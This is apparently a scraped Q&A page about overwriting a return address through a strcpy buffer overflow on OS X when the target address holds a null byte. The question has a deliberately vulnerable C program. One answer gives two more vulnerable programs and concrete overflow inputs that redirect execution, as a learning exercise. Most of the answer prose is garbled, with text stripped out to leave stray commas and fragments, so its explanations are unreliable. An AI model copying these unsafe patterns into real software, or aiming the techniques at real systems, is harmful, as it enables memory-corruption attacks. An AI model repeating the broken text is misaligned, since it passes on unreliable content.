Buffer overflow return address has 00

Question

Buffer overflow return address has 00

I was just trying to get a buffer overflow for working with OSX (10.6) in the following program; I need to execute foo by overflowing the buffer.

#include <string.h>
#include <stdio.h>
void foo() {
    printf("hacked!");
}
int main(int argc, const char *argv[]) {
    char s[100];
    strcpy(s, argv[1]);
}

I will compile it as: -

$ gcc -o test test.c -arch i386

When disassembling, testI get the address fooas 0x00001eda. Operation is not working properly; probably because the return address must be full using 0x00001edac contains \x00.

In cases where the destination address has \x00, how can a buffer overflow exploit be performed?

+5

c security buffer-overflow macos

user277465 Mar 25 '11 at 7:27

source share

3 answers

jschmier · Answer 1 · 2011-04-04T19:45:51+0000

strcpy() , (\x00). , , , , - .

- OS X 10.6, 64- Windows 7 GCC 4.5.2 (MinGW 32-bit). gdb, foo(), . , gdb , .

1

int main()
{
    char s[4];
    gets(s);
}

^{, .}

gcc -g -fno-stack-protector -o test test.c
printf 1234567890abcdef\xc6\x13\x30 |./test
!

2

int main(int argc, const char *argv[])
{
    char s[100];
    sscanf(argv[2], "%x", &s[atoi(argv[1])]);
}

^{atoi() " ". , .}

gcc -g -fno-stack-protector -o test test.c
./test 112 4013c6
!

karlphillip · Answer 2 · 2011-04-05T00:44:27+0000

- strcpy, , .

, , .

David Grayson · Answer 3 · 2011-04-05T04:25:55+0000

, ( , ) , , .

, (0x00001eda) :

0xda, 0x1e, 0x00, 0x00

, karlphillip. . . strcpy (\ x00). strcpy 3 . , , 4- \x00, 4- \x00?

, .

Buffer overflow return address has 00

1

2

More articles: